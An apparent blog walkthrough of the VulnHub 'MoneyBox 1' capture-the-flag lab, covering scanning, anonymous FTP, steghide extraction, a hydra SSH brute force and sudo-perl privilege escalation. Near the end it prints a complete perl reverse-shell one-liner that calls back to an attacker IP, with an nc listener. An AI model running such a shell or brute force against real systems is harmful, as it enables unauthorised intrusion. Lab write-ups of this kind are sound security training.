Capture the flag (CTF)

MoneyBox 1: VulnHub CTF walkthrough

LetsPen Test
July 1, 2021 by
LetsPen Test

This VulnHub capture the flag (CTF) is an easy-level challenge. The goal is to gain the root of the machine and read three flag files. You can download it here:

You can download the machine and run it on VirtualBox. The torrent downloadable URL is also available for this VM and has been added in the reference section of this article.

Please note: For all these machines, I have used Oracle VirtualBox to run the downloaded machine. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

The steps

  • Getting the IP address with the Netdiscover utility
  • Port scanning through Nmap
  • Enumeration web application
  • Enumerating FTP service
  • Configuring Steghide tool and extracting message from an image file
  • Launching brute force on SSH service
  • Getting the root and reading the flags

So, now we have all the information that we need, let’s get started with the challenge.

The walkthrough

Step 1

The first step is as always to run the Netdiscover command to identify the target machine's IP address. In the screenshot given below, we can see that we have run the Netdiscover command which gives us the list of all the available IP addresses. It can be seen in the following screenshot. [CLICK IMAGES TO ENLARGE]

Command used: << netdiscover >>

In the highlighted area of the above screenshot, we can see the IP address which is our target machine IP address. The target machine IP address is 192.168.11.21 and I will be using 192.168.11.25 as the attacker IP address.

Note: The target machine IP address may be different in your case, as it is being assigned by the network DHCP.

Step 2

The second step is to run a port scan to identify the open ports and services on the target machine. We will use the “Nmap” tool for port scanning as it works accurately and is available on Kali Linux by default. In the highlighted area of the following screenshot, we can see the Nmap command which we used to scan the ports on our target machine. The identified open ports can also be seen in the screenshot given below.

Command used: << namp 192.168.1.21 -p- -sV >>

As we can see above, there are three open ports and services available on the target machine. In the command used above, I used the “-sV” switch for enumerating the version information of the identified services and “-p-” to ensure that all the ports are scanned. With the help of Nmap, we have identified ports 21,22 and 80 as available on the target machine which are being used for the FTP, SSH and HTTP services, respectively.

Step 3

Let us start with the HTTP port, we opened the target machine IP on the browser for this purpose.

As we can see above there is a simple home page that says “welcome to Moneybox CTF.” There is not much to explore on this page. So, we decided to run a Dirb scan to identify other directories and files on the server. Dirb tool works by brute-forcing the target web application with known files and folders and analyses the application response. The result of the Dirb scan can be seen below.

Command used: << dirb http://192.168.1.21 >>

In the above screenshot, we can see that the website has a folder named ‘blogs,’ so let’s open this on the browser and explore further.

The URL showed some kind of hint message on the browser. It mentioned the username of a previous hacker that successfully hacked the machine and wants to disclose a hint.

We checked the source code of that page and found a useful hint. This can be seen in the following screenshot.

Here, in the comments section, we found the name of another hidden directory. Let us open the hidden directory on the browser.

As can be seen above, it was just a simple text shown on the browser, so we checked the source of the page which can be seen below.

Found secret key: 3xtr4ctd4t4

In the comments, we found a secret key, but we do not have anywhere to use it as of now so we took note of this information for later use. We tried a Dirb scan on the secret directory to find any other clues. The result can be seen in the following screenshot.

Command used: << dirb http://192.168.1.21/S3cr3t-T3xt/ >>

We could not find much information from the Dirb scan. As we have explored all the possible loopholes and hints on the HTTP port. So, in the next step, we will start the enumeration of the FTP service.

Step 4

As we know that FTP port was also identified open during the port scan. So let’s try to connect with the FTP service with the default username and password. One of the most common usernames and password is anonymous which we used to login as follows:

Command used: << ftp 192.168.1.21 >>

  • Username: anonymous
  • Password: anonymous

As we know the FTP port is open, we tried connecting to the FTP service as the "anonymous" user, the login was successful as "anonymous" user was enabled. After logging in, we checked the contents of the current directory using the "ls" command and found an image file. We noticed that the size of the image file was quite large. So, we decided to download this file for further analysis. The download process can be seen below.

Command used: << get trytofind.jpg >>

We have downloaded the image on the attacker machine; now, let’s open the file into the browser.

We could not find any clue in the image, so further decided to analyze it. After some research, we found a tool called "steghide." This tool is used for identifying hidden information from a file. Since we know that the image file size was quite large so Steghide can be used to extract the information. Steghide is not available in Kali Linux by default. So, in the next step, we will be using downloading and using this tool.

Step 5

The official website of the Steghide tool can be seen below.

With the help of this tool, we can identify if there is any hidden information in the image file. We checked whether it is by default available in Kali Linux, but seems like we will have to download it.

Command used: << apt-get install steghide -y >>

Here, we have downloaded the tool on our attacker machine with the help of "apt-get" command. Let us now try to use this tool to extract data from the image file. This can be seen below.

Command used: << steghide --extract -sf trytofind.jpg >>

As we can see that the file is protected with a passphrase which is required to be entered here to extract the file contents. As we know, we had identified a secret key in one o the previous steps. Let us use the secret key here and see if it works.

Password: 3xtr4ctd4t4

The secret key successfully worked as the command was successful. The tool extracted all the information from the image file and saved it in the "data.txt" file. Let us open the file with the help of the "cat" command which can be seen in the following screenshot.

Command used: << cat data.txt >>

We found another hint hidden in the image file. It says that there is another user named "renu" on the target machine and it was using a very weak password. So, let us try running a brute force attack on the SSH port for the username "renu."

Step 6

For this step, we have used the tool "hydra." It is a very popular password cracking tool which is available by default in Kali Linux. The command and the results of the brute force attack can be seen in the following screenshot.

Command used:

<< hydra -l renu -P /usr/share/wordlists/rockyou.txt 192.168.1.21 ssh >>

  • Password: 987654321
  • Username: renu

After completion, we identified the valid password for the user "renu," which was an all-numeric string. So, we have got another valid set of login details, so we’ll log in to the target machine as used "renu." This can be seen below:

Command used: << ssh renu@192.168.1.21 >>

We are successfully logged into the target machine as user "renu." So, in the next step we will try to get the root access.

Step 7

Until now, we only got user access on our target machine. Now, let us explore further weaknesses and clues to get to the root of the target machine.

Command used:

  • << id >>
  • << cat /etc/issue >>
  • << uname -a >>

We did some information gathering on the target machine to identify the running operating system and kernel versions. Then, we researched over the web for any available exploits for these versions, but none could be useful for our cause. So, we decided to explore the target machine manually for further hints or flags.

Command used: << cat user1.txt >>

We found our very first flag "user1.txt" in the current directory. The flag can be seen below. We kept on exploring other directories, during which we found one more user flag named :user2.txt;" this can be seen in the following screenshot.

Command used: << cat /home/lily/user2.txt >>

So far, we have found two user flags on the target machine. While exploring the files in various directories we found an SSH key in the home directory. This can be seen below.

Command used: << cat authorized_keys >>

The file named "authorized_keys" is the SSH key for another user "lily" on the target machine. So, let us switch the current user privilege to user "lily" with the help of the SSH keys. This can be seen in the following screenshot.

Command used: << ssh lily@127.0.0.1 >>

The login was successful, and we are now logged into the target machine as user "lily." So, let us enumerate further to gain root access.

Command used: << sudo -l >>

We checked the current user privilege using the "sudo –l" command and found that the current user can run "perl" command as root. As we know we can execute any payload on the target machine with the help of "perl." So, let’s craft a reverse shell on our attacker machine to gain root access to the target machine.

perl -e 'use Socket;$i="192.168.1.25";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

In the above screenshot, we can see the reverse shell payload which will allow us to capture incoming connections on our attacker machine IP 192.168.1.25 and port 1234.

Now, we need to execute this payload on the target machine to get the root, but before that let’s open "nc" on our attacker machine to receive incoming connections on port 1234. Let us execute the payload which can be seen below.

Command used: << nc -lvp 1234 >>

In the above screenshot, we can see that after waiting for some time we finally got the root access of the target machine. Now, we have the root of the target machine, let us now read the root flag and complete the challenge.

Command used: << cat .root.txt >>

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

The root flag was easily found in the current directory, which can be seen above. We have completed all the things in the challenge and, hence, completed the CTF.

 

Sources:

Steghide, Sourceforge http://steghide.sourceforge.net/

MoneyBox, VulnHub https://www.vulnhub.com/entry/moneybox-1,653/

LetsPen Test
LetsPen Test